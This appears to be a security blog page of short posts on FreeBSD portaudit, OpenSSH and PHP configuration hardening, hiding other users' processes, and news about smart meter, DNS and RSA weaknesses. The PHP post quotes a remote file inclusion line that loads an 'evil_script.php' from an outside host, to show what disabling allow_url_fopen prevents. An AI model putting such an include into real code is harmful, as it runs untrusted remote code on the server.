FreeBSD Tools: portaudit – FreeBSD’s Third Party Security Audit
Portaudit is a software vulnerability auditing tool for FreeBSD systems. FreeBSD's Portaudit provides a system to check if installed ports are listed in a database of published security vulnerabilities.
The ports-mgmt/portaudit port polls a database for known security issues. This database is updated and maintained by the FreeBSD Security Team and ports developers.
To begin using Portaudit, install it from the Ports Collection:
cd /usr/ports/ports-mgmt/portaudit make install cleanPrint This Post
SSH Security Tips – OpenSSH hardening security
In this article I'll show you some tricks to help you securing your OpenSSH service. Here you will find useful information on how to secure sshd and prevent ssh dictionary attack.
1. SSH security by tweaking sshd_config
The OpenSSH server configuration file is located in /etc/ssh/sshd_config. You need to restart sshd after every change you make to that file in order for changes to take effect.
- Change port number
Moving the SSH daemon off of port 22 protects you against automated attacks which assume that sshd is running on port 22.
Port 34912
- Allow only SSH protocol 2
Only SSH protocol version 2 connections should be permitted. Version 1 of the protocol contains security vulnerabilities. The default setting shipped in the configuration file is correct, but it's important to check.
Protocol 2
Print This PostFreeBSD: How To Prevent Users from seeing information about processes owned by others
FreeBSD has inbuilt security measure to disallow users to see processes that are being run under another UID to avoid information snooping. To enable this security feature via sysctl, type the following commands:
sysctl security.bsd.see_other_uids=0 sysctl security.bsd.see_other_gids=0
To enable this security feature on boot, add the following lines to /etc/sysctl.conf:
# Hide UID and GID from other users security.bsd.see_other_gids=0 security.bsd.see_other_uids=0Print This Post
PHP Security Tips – Securing PHP by hardening PHP configuration
When it comes to security, ignorance is definitely not blissful. There are several methods to increase the security of your PHP environment.
In this article I will discuss how to secure PHP by hardening PHP 5 configuration.
1. allow_url_fopen ( enabled by default )
This directive allows PHP's file functions ( file_get_contents, include and require statements ) to retrieve data from remote locations, like FTP or HTTP.
If an attacker can manipulate the arguments to those functions, they can use a URL under their control as the argument and run their own remote scripts. The vulnerability is called Remote file inclusion or RFI.
; Disable allow_url_fopen in php.ini for security reasons
allow_url_fopen = Off
The setting can also be applied in apache's httpd.conf :
# Disable allow_url_fopen for security reasons
php_admin_flag allow_url_fopen Off
It prevents URLs from being used in PHP. A command like include ("http://www.example.com/evil_script.php") will not be allowed to execute. Only files that reside within your site can be included: include("/var/www/html/config.inc.php").
Print This Post“Smart” meters have security holes
SAN FRANCISCO — Computer-security researchers say new "smart" meters that are designed to help deliver electricity more efficiently also have flaws that could let hackers tamper with the power grid in previously impossible ways.
At the very least, the vulnerabilities open the door for attackers to jack up strangers' power bills. These flaws also could get hackers a key step closer to exploiting one of the most dangerous capabilities of the new technology, which is the ability to remotely turn someone else's power on and off.
Read more directly from the source.
Print This PostChina’s Great Firewall spreads overseas
A networking error has caused computers in Chile and the U.S. to come under the control of the Great Firewall of China, redirecting Facebook, Twitter, and YouTube users to Chinese servers.
Security experts are not sure exactly how this happened, but it appears that at least one ISP recently began fetching high-level DNS (domain name server) information from what's known as a root DNS server, based in China. That server, operated out of China by Swedish service provider Netnod, returned DNS information intended for Chinese users, effectively spreading China's network censorship overseas. China tightly controls access to a number of Web sites, using technology known colloquially as the Great Firewall of China.
Read more directly from the source.
Print This PostResearchers Find Way To Zap RSA Algorithm
Three University of Michigan computer scientists say they have found a way to exploit a weakness in RSA security technology used to protect everything from media players to smartphones and e-commerce servers. Read more via networkworld.com.
Print This Post